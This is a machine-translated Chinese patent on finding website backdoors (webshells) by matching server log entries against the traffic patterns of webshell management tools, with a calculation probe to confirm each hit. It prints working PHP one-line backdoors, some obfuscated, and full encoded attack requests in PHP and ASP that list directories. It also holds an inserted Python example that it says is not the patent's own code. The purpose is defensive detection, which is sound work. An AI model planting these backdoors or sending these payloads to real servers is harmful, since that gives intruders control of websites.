CN107104924A - The verification method and device of website backdoor file - Google Patents
Publication number: CN107104924A (application CN201610096648.2A)
Authority: CN (China)
Prior art keywords: verified, file, internet access, record, access request
Legal status: Granted (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Classifications: H04L63/1425 (network security, monitoring network traffic: traffic logging, e.g. anomaly detection); H04L63/083 (network security, authentication of entities using passwords)
Abstract
The invention discloses a verification method and device for website backdoor files. The method includes: obtaining network access log records; analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified; choosing a verification mode according to the request type to which each network access request record to be verified belongs; and verifying, by the chosen verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file. The invention solves the technical problem of the related art, in which website backdoor files are determined by feature matching, a mode with relatively low accuracy that is prone to false negatives and false positives.
Description
Technical field
The present invention relates to the internet field, and in particular to a verification method and device for website backdoor files.
Background technology
A Webshell is a website backdoor file: "Web" means that the website server must expose a web service, and "shell" means obtaining, to some extent, operating rights on the website server. A Webshell is a command execution environment that exists in the form of a web page file such as ASP, PHP, JSP or CGI; it is usually written in the same programming language as the website server and placed in the website directory. A Webshell receives arbitrary parameters from the visitor, adds them to its own code and runs them, then returns the result to the visitor. Therefore, after invading a website, a hacker will usually mix a Webshell among the normal web page files under the server's Web directory, so that the Webshell can be accessed with a browser for the purpose of controlling the website server in the long term, including but not limited to uploading and downloading files, inspecting databases and executing arbitrary program commands. Because programming languages are versatile and flexible, new Webshells have largely lost the static backdoor features and can easily bypass detection by backdoor identification tools.
Webshell management tools communicate with the website backdoor file using a special communication protocol to provide functions such as browsing disk directories, uploading or downloading files and executing system commands. Their main working principle is: a Webshell that the management tool can access is uploaded to the website; the management tool converts the above functions into dynamically generated code, packages it in the form agreed by the communication protocol, and sends the communication content to the Webshell in the manner of an ordinary web page access. After running the code, the Webshell packages the result according to the same communication protocol and returns it to the management tool. Although the content of each communication differs with the function invoked, the protocol is limited by its own design, so part of each communication always satisfies certain features.
After uploading a Webshell file, most hackers choose to access the Webshell with a Webshell management tool. Therefore, most Webshells can be associated with access records of Webshell management tools. Although website backdoor files are ever-changing, the communication protocol of the Webshell management tools commonly used by hackers is constant.
The website backdoor detection method employed in the related art is to install a backdoor detection tool on the website server and confirm whether backdoor files exist by scanning the website files for backdoor features. These website backdoor detection tools essentially all use static analysis technology and sandbox dynamic debugging: they parse the syntax of the code, construct its execution flow, detect calls to dangerous functions, and finally decide by simulated execution whether the code is a website backdoor.
However, this detection mode has considerable drawbacks. First, website backdoors are written in a wide variety of programming languages, and the lack of a fixed file format adds to the complexity of backdoor feature detection. Second, feature detection depends on a file feature library; every new kind of backdoor file requires an update of the library, which causes the library to consume excessive storage space. Third, website backdoors all disguise themselves as the website's normal web page files, so a certain number of false negatives and false positives easily arise during detection.
Moreover, the programming languages used by most website servers all support generating and running dynamic code. The "one-line trojan" backdoor files that are currently in fashion make good use of this characteristic to encrypt and obfuscate their code. Such one-line trojan backdoor files have completely lost the conventional website backdoor features and therefore easily bypass file feature detection.
Therefore, to prevent the website backdoor file from being found by the webmaster or detected by the security software configured on the website server, hackers generally choose a one-line trojan as the backdoor file and insert it into a normal web page file of the website server; at the same time, the backdoor code is encrypted or obfuscated so that, on the surface, the backdoor file does not look like a backdoor file of the website server.
Here is example code of a common one-line trojan backdoor file; its concrete form is as follows:
<?php
@eval($_POST['c']);
?>
It is clear from the above code that it has an obvious one-line trojan backdoor feature: the visitor can pass arbitrary code to the eval function and have it executed, so eval is a dangerous function call, and backdoor detection tools based on file features can find such website backdoor files.
However, consider the one-line trojan backdoor code shown below:
<?php
$c = $_POST['c'];
assert($c);
?>
Although the dangerous function call assert is present in this backdoor code, the source of the variable "c" cannot be confirmed, so the detection effect of most file-feature-based backdoor detection tools on such Webshell backdoor files is in fact unsatisfactory.
In addition, a base64-encoded one-line trojan backdoor code is as follows:
<?php
eval(gzuncompress(base64_decode('eJxTiQ/wDw6JVk9Wjw ... UAEwkDMw==')));
?>
The above backdoor code has been base64-encoded and gzcompress-compressed, shows no backdoor features on the surface, and is only restored to backdoor code during actual execution; therefore conventional backdoor detection tools are also helpless against such website backdoor files.
No effective solution to the above problems has yet been proposed.
Summary of the invention
The embodiments of the invention provide a verification method and device for website backdoor files, at least to solve the technical problem of the related art, in which website backdoor files are determined by feature matching, a mode with relatively low accuracy that is prone to false negatives and false positives.
According to one aspect of the embodiments of the invention, a verification method for website backdoor files is provided, including: obtaining network access log records; analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified; choosing a verification mode according to the request type to which the network access request record to be verified belongs; and verifying, by the chosen verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified includes: using the communication protocol to parse, one by one and segment by segment, all the network access request records contained in the network access log records; and determining, as network access request records to be verified, those whose parsed request body content contains a code segment executed by a website backdoor file and/or a fixed field set in the communication protocol.
Optionally, choosing a verification mode according to the request type to which the network access request record to be verified belongs includes: extracting the uniform resource locator (URL) from the request line of the network access request record to be verified; determining the request type according to the suffix contained in the URL; and choosing a verification mode for the network access request record to be verified according to the request type.
Optionally, verifying by the verification mode whether the file accessed by the network access request record to be verified is a website backdoor file includes: extracting from the network access request record to be verified the connection password used to access the corresponding file; when the request type is the PHP type or the ASP type, looking up in the network access request record to be verified the executable code section corresponding to the connection password; running the executable code section according to a default calculation to generate a running result; and, when the running result is consistent with a default result, determining that the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, verifying by the verification mode whether the file accessed by the network access request record to be verified is a website backdoor file includes: extracting from the network access request record to be verified the connection password used to access the corresponding file; when the request type is the JSP type, looking up in the network access request record to be verified the executable code section corresponding to the connection password; running the executable code section according to a specified command function to generate a display result; and, when the display result matches the functional characteristic of the command function, determining that the file accessed by the network access request record to be verified is a website backdoor file.
According to another aspect of the embodiments of the invention, a verification device for website backdoor files is also provided, including: an acquisition module for obtaining the network access log records produced by external access to the server; an analysis module for analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified; a selection module for choosing a verification mode according to the request type to which the network access request record to be verified belongs; and a verification module for verifying, by the chosen verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, the analysis module includes: a parsing unit for using the communication protocol to parse, one by one and segment by segment, all the network access request records contained in the network access log records; and a first determining unit for determining, as network access request records to be verified, those whose parsed request body content contains a code segment executed by a website backdoor file and/or a fixed field set in the communication protocol.
Optionally, the selection module includes: a first extraction unit for extracting the URL from the request line of the network access request record to be verified; a second determining unit for determining the request type according to the suffix contained in the URL; and a selection unit for choosing a verification mode for the network access request record to be verified according to the request type.
Optionally, the verification module includes: a second extraction unit for extracting from the network access request record to be verified the connection password used to access the corresponding file; a lookup unit for looking up, when the request type is the PHP type or the ASP type, the executable code section corresponding to the connection password in the network access request record to be verified; a generation unit for running the executable code section according to a default calculation to generate a running result; and a third determining unit for determining, when the running result is consistent with the default result, that the file accessed by the network access request record to be verified is a website backdoor file.
Optionally, the verification module includes: a second extraction unit for extracting from the network access request record to be verified the connection password used to access the corresponding file; a lookup unit for looking up, when the request type is the JSP type, the executable code section corresponding to the connection password in the network access request record to be verified; a generation unit for running the executable code section according to a specified command function to generate a display result; and a third determining unit for determining, when the display result matches the functional characteristic of the command function, that the file accessed by the network access request record to be verified is a website backdoor file.
In the embodiments of the invention, no feature matching is performed on the backdoor file. Instead, the network access log records retained on the server are analyzed according to the communication protocol used to access website backdoor files in order to select the network access request records to be verified, and a verification mode chosen according to the request type of each such record confirms whether the network backdoor file really exists. This effectively improves the success rate of identifying website backdoor files and significantly reduces the probability of false negatives and false positives in the verification process, thereby solving the technical problem of the related art, in which website backdoor files are determined by feature matching, a mode with relatively low accuracy that is prone to false negatives and false positives.
Brief description of the drawings
The accompanying drawings described here provide a further understanding of the invention and form part of this application; the schematic embodiments of the invention and their description explain the invention and do not unduly limit it. In the drawings:
Fig. 1 is a hardware block diagram of a computer terminal for the verification method of website backdoor files according to an embodiment of the invention;
Fig. 2 is a flow chart of the verification method of website backdoor files according to an embodiment of the invention;
Fig. 3 is a block diagram of the verification device for website backdoor files according to an embodiment of the invention;
Fig. 4 is a block diagram of the verification device for website backdoor files according to a preferred embodiment of the invention;
Fig. 5 is a block diagram of a computer terminal according to an embodiment of the invention.
Detailed description of the embodiments
In order that those skilled in the art may better understand the solution of the invention, the technical solution in the embodiments of the invention is described below clearly and completely with reference to the accompanying drawings. Obviously, the described embodiments are only a part of the embodiments of the invention, not all of them. All other embodiments obtained by those of ordinary skill in the art on the basis of the embodiments of the invention without creative work fall within the scope of protection of the invention.
It should be noted that the terms "first", "second" and the like in the description, claims and the above drawings are used to distinguish similar objects and not to describe a specific order or sequence. It should be understood that data so used may be interchanged where appropriate, so that the embodiments of the invention described here can be implemented in an order other than those illustrated or described here. In addition, the terms "comprising" and "having" and any variations of them are intended to cover a non-exclusive inclusion; for example, a process, method, system, product or device containing a series of steps or units is not necessarily limited to the steps or units expressly listed, but may include other steps or units that are not expressly listed or that are inherent to the process, method, product or device.
Embodiment 1
According to an embodiment of the invention, a method embodiment of the verification method for website backdoor files is also provided. It should be noted that the steps illustrated in the flow chart of the drawings may be performed in a computer system such as a set of computer-executable instructions, and that, although a logical order is shown in the flow chart, in some cases the steps shown or described may be performed in an order different from the one here.
The method embodiment provided in Embodiment 1 of this application may be executed in a mobile terminal, a computer terminal or a similar computing device. Taking execution on a computer terminal as an example, Fig. 1 is a hardware block diagram of a computer terminal for the verification method of website backdoor files according to an embodiment of the invention. As shown in Fig. 1, the computer terminal 10 may include one or more processors 102 (only one is shown in the figure; a processor 102 may include but is not limited to a processing unit such as a microprocessor (MCU) or a programmable logic device (FPGA)), a memory 104 for storing data, and a transmission device 106 for communication. Those of ordinary skill in the art will understand that the structure shown in Fig. 1 is only illustrative and does not limit the structure of the above electronic device. For example, the computer terminal 10 may also include more or fewer components than shown in Fig. 1, or have a configuration different from that shown in Fig. 1.
The memory 104 may be used to store the software programs and modules of the application software, such as the program instructions/modules corresponding to the verification method for website backdoor files in the embodiment of the invention; the processor 102 runs the software programs and modules stored in the memory 104 to perform various functional applications and data processing, that is, to implement the above verification method for website backdoor files. The memory 104 may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory or other non-volatile solid-state memory. In some examples, the memory 104 may further include memory located remotely from the processor 102, and such remote memory may be connected to the computer terminal 10 through a network. Examples of such a network include but are not limited to the internet, an intranet, a local area network, a mobile communication network and combinations thereof.
The transmission device 106 is used to receive or send data via a network. Specific examples of the network may include a wireless network provided by the communication provider of the computer terminal 10. In one example, the transmission device 106 includes a network interface controller (NIC), which can be connected to other network devices through a base station so as to communicate with the internet. In one example, the transmission device 106 may be a radio frequency (RF) module, which is used to communicate with the internet wirelessly.
Under the above running environment, this application provides the verification method for website backdoor files shown in Fig. 2. Fig. 2 is a flow chart of the verification method for website backdoor files according to an embodiment of the invention. The method includes the following processing steps:
Step S202: obtain network access log records, where the network access log records may be generated by an external client (for example, a personal computer) accessing the local server, or, of course, by an external mobile terminal or other device accessing the local server;
Step S204: analyze the network access log records according to the communication protocol used to access website backdoor files and select the network access request records to be verified; for example, identify the Webshell communication protocol in order to find, in the server logs, the records of a hacker accessing a Webshell;
Step S206: choose a verification mode according to the request type to which the network access request record to be verified belongs;
Step S208: verify, by the chosen verification mode, whether the file accessed by the network access request record to be verified is a website backdoor file.
The backdoor detection schemes provided in the related art can only search for features in static code, or simulate execution after syntax analysis, but neither can fully reverse the real code or recognize the real behaviour of the program. With the technical solution provided by the embodiments of the invention, no feature matching is performed on the backdoor file; instead, the network access log records retained on the server are analyzed according to the communication protocol used to access website backdoor files in order to select the network access request records to be verified, and a verification mode chosen according to the request type of each such record confirms whether the network backdoor file really exists. This not only recognizes conventional website backdoor files but also obfuscated ones, so the success rate of identifying website backdoor files is effectively improved and the probability of false negatives and false positives in the verification process is significantly reduced, thereby solving the technical problem of the related art, in which website backdoor files are determined by feature matching, a mode with relatively low accuracy that is prone to false negatives and false positives.
Optionally, in step S204, analyzing the network access log records according to the communication protocol used to access website backdoor files and selecting the network access request records to be verified may include the following steps:
Step S1: use the communication protocol to parse, one by one and segment by segment, all the network access request records contained in the network access log records;
Step S2: determine, as network access request records to be verified, those whose parsed request body content contains a code segment executed by a website backdoor file and/or a fixed field set in the communication protocol.
A website backdoor file usually leaves access data and data submission records of the Webshell page in the Web log records of the website server. Moreover, a website backdoor file only executes a specific command after receiving external parameters, and, to ensure that the website backdoor can be used only by its visitor, the backdoor file usually has a unique connection password, which can be obtained by analyzing the log content. The working principle of Webshell management tools essentially consists in inserting coded command parameters into the Web request, where the first parameter is the connection password, and then passing them to the backdoor file.
The communication protocol of Webshell management tools is broadly divided into the following three layers:
The first layer is a function that executes PHP code, for example eval or assert;
The second layer is a base64 decoding function, for example base64_decode;
The third layer is the base64-encoded code, i.e. the request body content mentioned in step S2 above, which is also the part that this application needs to focus on and parse.
The code that the hacker, as the visitor, wishes to execute is stored in the base64-encoded code of the above third layer. At present, in order to evade detection and removal by server security tools, the mainstream Webshell management tools all seek improvements in the first or second layer to obfuscate the backdoor code. However, whatever transformation is used, the leading portion of the base64 encoding is normally unchanged, so a matching operation can be performed according to the above feature.
In a Web request the user can customize many parameters, such as the uniform resource locator (URL), the user agent (User-Agent), the data stored on the user's terminal (Cookie) and the submitted data (post_data). These controllable points can all be used by Webshell management tools to transfer parameters. Therefore, log analysis can determine whether the content of these controllable points in each web log entry matches the communication protocol characteristics of Webshell management tools. If it does, information such as the URL and the connection password of that log entry can be stored in a database to await further detection.
The above log analysis process is described in further detail below, taking PHP-type, ASP-type and JSP-type network access requests as examples.
1. Network access requests of the PHP type
Suppose there is a webshell hehe.php under the root directory of the target website, with the following content:
<?php @eval($_POST[8]); ?>
This is a common and relatively simple PHP-type one-line trojan.
The form of a normal access request sent by a browser is as follows:
GET /hehe.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
However, a PHP-type access request sent by a Webshell management tool takes the following form:
POST /hehe.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close

8=@eval(base64_decode(QGV2YWwBKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpOw));&z0=
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ
2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+
fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGP
T1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO3
1lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjs
kVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29u
dmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkU
CkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUj
T9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZG llKCk7&z1=
RDpcXHhhbXBwXFxodGRvY3NcXA==
The access request sent by the Webshell management tool above is analyzed as follows:
First, the digit "8" to the left of the first equals sign in the POST content is the password of this Webshell, corresponding to $_POST[8] in the code; that is, in each access request sent by a Webshell management tool, the content to the left of the first equals sign is the connection password of the Webshell.
Second, the content to the right of the first equals sign is a segment of PHP code whose basic format is usually @eval(base64_decode(var1)); where the content "var1" inside the innermost brackets is base64-encoded content, the next bracket outwards is the decoding function, and the outermost is the PHP execution function. In addition, the content inside var1 is usually @eval(base64_decode($_POST[z0]));
Finally, the content after ";" may consist of one or more variables z1-z5; these variables are all base64-encoded and show some PHP code after decoding.
Based on the above analysis, the log analysis process provided by the embodiment of the invention needs to complete the following work:
(1) Extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) The innermost var1 in @eval(base64_decode(var1)) is in some cases discontinuous and hard to match, but the base64 content usually needs to perform the action of "receiving a follow-up variable" (for example, receiving z0), and the only way to receive it is "$_POST[z0]". Therefore it is only necessary to match the base64 string corresponding to $_POST[z0] to be able to assume, in essence, that the access request was sent by a Webshell management tool. However, considering that z0 may vary, generally only "$_POST[" is matched.
It should be noted that the above "$_POST[" is the fixed field set in the communication protocol mentioned in step S2.
(3) The result of the above matching of "$_POST[" only indicates that the access request is suspected of having been sent by a Webshell management tool, because "$_POST[" may also appear in encoded form in regular business requests. At this point, the base64 content in z1-z5 must be further matched: this section of content necessarily contains code that a Webshell can execute, for example @set_magic_quotes_runtime(0);@set_time_limit(0), and only after the base64 content in z1-z5 has been further matched can it be further determined that this is a Webshell.
It should be noted that the code that a Webshell can execute, which necessarily appears in the above z1-z5, is the code segment executed by a website backdoor file mentioned in step S2.
2. Internet access requests of ASP type
Assume that an ASP-type access request sent by a Webshell management tool has the following form:
Ysh=Execute (" Execute (" " On+Error+Resume+Next:Function+bd(byVal+s):For
+ i=1+To+Len (s)+Step+2:C=Mid (s, i, 2):If+IsNumeric(Mid(s,i,1))+Then:Execute
(" " " " bd=bd&chr (s &H " " " " &c& " " " ") " " " "):Else:Execute (" " " " bd=bd&chr (s &H " " " " &c&Mid
(s,i+2,2)&"""")""""):I=i+2:End+If""&chr(10)&""Next:End+Function:
Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""&bd(""""
44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E20464
4286474293A46443D596561722864742926222D223A4966204C656E284D6F6E74682864742929
3D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682
864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D46442622
30223A456E642049663A46443D464426446179286474292622202226466F726D6174446174655
4696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D3120546865
6E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E6
42046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E
672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C64657
2282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528
224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723
A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F
6E73652E577269746520462E4E616D6526636872283437292663687228392926464428462E446
174654C6173744D6F646966696564292663687228392926636872283438292663687228392926
432E476574466F6C64657228462E50617468292E6174747269627574657326636872283130293
A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E57
72697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696
5642926636872283929264C2E73697A652663687228392926432E47657446696C65284C2E5061
7468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):
Response.Write(""""|<-""""):Response.End " ") ") &z1=
663A5C5C7573725C5C4C6F63616C557365725C5C717877313539303936303432355C5C636F6E6
669675C5C
Based on the above analysis, the log analysis process provided by the embodiment of the present invention needs to complete the following work:
(1) As with the PHP-type requests above, extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) Compared with PHP-type requests, the code at the front of an ASP-type request is more heavily obfuscated and harder to match, so matching of the code section at the front of ASP-type requests can be omitted. That is, it is not necessary to determine the internet access request record to be verified by judging whether the parsed request body content contains the fixed field set in the communication protocol.
(3) The middle section of an ASP-type request is a string of equal-length characters encoded in hexadecimal (hex), and it contains the function CreateObject("Scripting.FileSystemObject") that a Webshell must use, i.e. "4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a6563742229" after hex encoding. If the above function is matched, it can be preliminarily determined that this is a Webshell.
It should be noted that the Webshell-executable code appearing in z1-z5 above is the code segment executed by the website backdoor file mentioned in step S2.
3. Internet access requests of JSP type
Assume that a JSP-type access request sent by a Webshell management tool has the following form:
Ch023=B&z0=UTF-8&z1=D:\\Install+Software\\tomcat7\\webapps\\cxzm\\
Based on the above analysis, the log analysis process provided by the embodiment of the present invention needs to complete the following work:
(1) As with the PHP-type requests above, extract the Webshell connection password from the access request sent by the Webshell management tool.
(2) The capital letter to the right of the first equals sign in the JSP-type request above represents an operation code name; the letters A-Z represent different operations. Since z0 in JSP-type requests remains essentially unchanged, the regular expression =[A-Z]&z0= can be used here.
It should be noted that for JSP-type internet access requests it is usually only necessary to perform the matching operation mentioned in step S2 above, that is, whether the parsed request body content contains the fixed field set in the communication protocol.
Optionally, in step S206, choosing a verification mode according to the request type to which the internet access request record to be verified belongs includes the following operations:
Step S3: extract the URL from the request line of the internet access request record to be verified;
Step S4: determine the request type according to the suffix portion of the URL;
Step S5: choose a verification mode for the internet access request record to be verified according to the request type.
For example, in the request line "POST /hehe.php HTTP/1.1" of a PHP-type access request sent by a Webshell management tool, the URL "hehe.php" can be extracted from the request line by parsing; then, from the suffix portion ".php" of this URL it can be determined that this is a PHP-type internet access request, so the PHP-type verification scheme can be chosen for it.
Optionally, in step S208, verifying by the verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file may include the following steps:
Step S6: extract from the internet access request record to be verified the connection password used to access the corresponding file;
Step S7: in the case where the request type is PHP type or ASP type, search the internet access request record to be verified for the executable code section corresponding to the connection password;
Step S8: run the executable code section according to a preset calculation to generate an operation result;
Step S9: when the operation result is consistent with the preset result, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
A URL extracted in the above log analysis as matching the communication protocol characteristics of Webshell management tools does not necessarily mean that the site file corresponding to this URL is a backdoor file. The reason is that many hackers on the current network actively scan for website backdoor files; these scan requests themselves also carry fixed URL addresses and at the same time use the communication protocol of Webshell management tools to attempt to interact with the target file. These scan requests are therefore likely to match part of the communication protocol characteristics of Webshell management tools and be identified as backdoor files. Thus behaviour such as hackers actively scanning for website backdoor files easily causes a large number of false positives in which the site file corresponding to the URL is reported as a backdoor file.
Accordingly, effective technical means must be taken to exclude the false positives produced by behaviour such as hackers actively scanning for website backdoor files. To this end, first, a separate set of backdoor verification schemes must be designed for the backdoor files of each programming language; secondly, the suffix of the backdoor URL obtained by the log analysis process as matching the communication features of Webshell management tools determines which specific verification scheme is used; then the connection password is reused to verify the backdoor file, and finally only a successfully verified website backdoor URL can be definitively regarded as a website backdoor file that currently exists.
1. For PHP-type internet access requests:
Because the content on the other side of the equals sign from the connection password is executed directly by the server, one can first try to make the file perform a simple calculation and then display the result. If the content returned by the calculation is consistent with the expected result, the file is confirmed to be a Webshell.
Assume that the PHP-type access request sent by the Webshell management tool is as follows:
POST /hehe.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
The executable code section corresponding to the connection password is located by the connection password digit "8", and the operation result is generated according to the following preset calculation:
8=die(md5(233333));
If the operation result returns fb0b32aeafac4591c7ae6d5e58308344, consistent with the expected calculation result, verification is confirmed successful, and the file accessed by the PHP-type internet access request is a website backdoor file.
2. For ASP-type internet access requests:
The verification principle is the same as that for PHP-type access requests; that is, assume that the ASP-type access request sent by the Webshell management tool is as follows:
POST /hehe.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
The executable code section corresponding to the connection password is located by the connection password digit "8", and the operation result is generated according to the following preset calculation:
8=response.write(654363512+3656342)
If the operation result returns 658019854, consistent with the expected calculation result, verification is confirmed successful, and the file accessed by the ASP-type internet access request is a website backdoor file.
Optionally, in step S208, verifying by the verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file may include the following operations:
Step S10: extract from the internet access request record to be verified the connection password used to access the corresponding file;
Step S11: in the case where the request type is JSP type, search the internet access request record to be verified for the executable code section corresponding to the connection password;
Step S12: run the executable code section according to a specified command function to generate a display result;
Step S13: when the display result meets the functional characteristic of the command function, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
For JSP-type internet access requests:
Because a JSP trojan cannot directly execute the code in the POST content and can only execute a small number of preset instructions, one can try to perform a "list directory" operation. That is, assume that the JSP-type access request sent by the Webshell management tool is as follows:
POST /hehe.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Content-Length: 765
Connection: Close
The executable code section corresponding to the connection password is located by the connection password digit "8", and the display result is generated according to the following preset function command:
8=A&z0=UTF-8
If the returned display result carries "|<-" and "->|", the operation currently performed is "list directory"; verification is successful, and the file accessed by the JSP-type internet access request is a website backdoor file.
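The verification stage described above, as an added Python example that is not the patent's own code: it builds the page's calculation probe for an extracted password and checks the returned body, dropping suspected hits (such as scanner requests against non-existent files) whose responses do not match. The response bodies, URLs and function names are constructed assumptions; no request is sent.

```python
import hashlib
import re

# The page's harmless calculations, one per request type; the connection password
# extracted during log analysis replaces the "8" used in the page's examples.
PROBES = {
    "php": "{pw}=die(md5(233333));",
    "asp": "{pw}=response.write(654363512+3656342)",
    "jsp": "{pw}=A&z0=UTF-8",
}
# Expected results, computed rather than hard-coded.
EXPECTED = {
    "php": hashlib.md5(b"233333").hexdigest(),
    "asp": str(654363512 + 3656342),
}
# A JSP "list directory" reply is wrapped in the page's two markers.
JSP_LISTING = re.compile(r"->\|(.*)\|<-", re.DOTALL)


def build_probe(kind: str, password: str) -> str:
    """POST body asking a suspected file to perform the page's calculation."""
    return PROBES[kind].format(pw=password)


def is_confirmed(kind: str, response_body: str) -> bool:
    """True only when the response is the calculation result itself.

    Exact comparison after trimming keeps an ordinary page that merely echoes the
    request, or an error page that happens to contain digits, from confirming.
    """
    body = response_body.strip()
    if kind in ("php", "asp"):
        return body == EXPECTED[kind]
    if kind == "jsp":
        m = JSP_LISTING.search(body)
        return m is not None and m.group(1).strip() != ""   # non-empty listing between markers
    return False


def confirm_suspects(suspects, responses) -> list:
    """Keep only suspected (url, kind, password) hits whose probe response verifies.

    `responses` maps each url to the body the server returned for build_probe();
    scanner hits on missing or ordinary files fail here and are dropped.
    """
    return [url for url, kind, password in suspects
            if build_probe(kind, password) and is_confirmed(kind, responses.get(url, ""))]


# Constructed log-analysis output and server replies (not from the page): a real
# PHP shell returns the bare md5, a JSP shell returns a listing inside the markers,
# a scanner's hit on a missing file gets the error page, a blog post echoes text.
SUSPECTS = [
    ("/hehe.php", "php", "8"),
    ("/hehe.jsp", "jsp", "8"),
    ("/old/shell.php", "php", "8"),
    ("/post.asp", "asp", "x"),
]
RESPONSES = {
    "/hehe.php": hashlib.md5(b"233333").hexdigest() + "\n",
    "/hehe.jsp": "->|D:\\\\tomcat7\\\\webapps\\\\\t2016-01-01 00:00:00\t0\t|<-",
    "/old/shell.php": "<html><body><h1>404 Not Found</h1></body></html>",
    "/post.asp": "<p>You wrote: x=response.write(654363512+3656342)</p>",
}

if __name__ == "__main__":
    print(confirm_suspects(SUSPECTS, RESPONSES))
```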
It should be noted that, for brevity, each of the foregoing method embodiments is expressed as a series of combinations of actions, but those skilled in the art should know that the present invention is not limited by the described sequence of actions, because according to the present invention some steps may be performed in another order or simultaneously. Secondly, those skilled in the art should also know that the embodiments described in this description are preferred embodiments, and the actions and modules involved are not necessarily required by the present invention.
Through the above description of the embodiments, those skilled in the art can clearly understand that the verification method of the website backdoor file according to the above embodiments can be implemented by software plus a necessary general-purpose hardware platform, or by hardware, though the former is the better implementation in many cases. Based on this understanding, the technical solution of the present invention, in essence or the part that contributes to the prior art, can be embodied in the form of a software product stored in a storage medium (such as ROM/RAM, magnetic disk or optical disk) that includes instructions to cause a terminal device (which may be a mobile phone, computer, server or network device) to perform the method described in each embodiment of the present invention.
Embodiment 2
According to an embodiment of the present invention, there is also provided a verification device for implementing the above verification of a website backdoor file. As shown in Fig. 3, the device includes: an acquisition module 10, for obtaining network access log records; an analysis module 20, for analysing the network access log records according to the communication protocol used to access website backdoor files and choosing the internet access request records to be verified; a choosing module 30, for choosing a verification mode according to the request type to which the internet access request record to be verified belongs; and a verification module 40, for verifying by the chosen verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, Fig. 4 is a structural block diagram of the verification device of the website backdoor file according to a preferred embodiment of the present invention. As shown in Fig. 4, the analysis module 20 may include: a parsing unit 200, for parsing all the internet access request records contained in the network access log records one by one, segment by segment, using the communication protocol; and a first determining unit 202, for determining the internet access request records whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol as the internet access request records to be verified.
Optionally, as shown in Fig. 4, the choosing module 30 may include: a first extraction unit 300, for extracting the URL from the request line of the internet access request record to be verified; a second determining unit 302, for determining the request type according to the suffix portion of the URL; and a choosing unit 304, for choosing a verification mode for the internet access request record to be verified according to the request type.
Optionally, as shown in Fig. 4, the verification module 40 may include: a second extraction unit 400, for extracting from the internet access request record to be verified the connection password used to access the corresponding file; a searching unit 402, for searching, in the case where the request type is PHP type or ASP type, the internet access request record to be verified for the executable code section corresponding to the connection password; a generation unit 404, for running the executable code section according to a preset calculation to generate an operation result; and a third determining unit 406, for determining, when the operation result is consistent with the preset result, that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the verification module 40 may include: a second extraction unit 400, for extracting from the internet access request record to be verified the connection password used to access the corresponding file; a searching unit 402, for searching, in the case where the request type is JSP type, the internet access request record to be verified for the executable code section corresponding to the connection password; a generation unit 404, for running the executable code section according to a specified command function to generate a display result; and a third determining unit 406, for determining, when the display result meets the functional characteristic of the command function, that the file accessed by the internet access request record to be verified is a website backdoor file.
